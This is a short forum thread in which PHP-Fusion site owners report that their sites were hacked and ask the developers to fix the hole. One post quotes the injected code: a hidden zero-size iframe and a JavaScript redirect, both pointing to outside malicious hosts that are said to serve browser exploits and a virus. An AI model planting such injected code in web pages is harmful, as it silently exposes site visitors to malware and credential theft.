Russian sites hacked - http://php-fusion.foxel.ru/ and http://php-fusion.int.ru/

My site, and Russian sites have been tampered support this way:

1. A new panel (not through the admin panel), with such content:
echo ( "<iframe width='0' height='0' scrolling='no' noresize src='http://novor.info/iframe.php'>");

2. File the following:
<script> document.location.replace (http://58.65.234.105/cgi-bin/nsp15/in.cgi?p=spuser ");</ script>

A further exploits himself. Upon receiving a link IE exploits and virus, and the remaining browsers -- simply redirects to google.com.

You have driven a huge hole in the safety system, the very sought, not found, I draw attention.

Sorry for my English.
I am Ukrainian (Russian).

Please, find an error in the safety of your engine, and fix it.

Later will be better translation.

My version is 6.01.12. And my site is hacked too.

Ooops! It was 6.01.11. Now it's 6.01.12. Is it in safety now?

The admins don't have any viruses on their computers, well there might be some, if they visited the site with Internet Explorer and the saw that iflame virus and passes stealing )if the have a good anti-virus, then it blocks those scripts (my anti-virus blocked them). but I've changed the passes just in case.
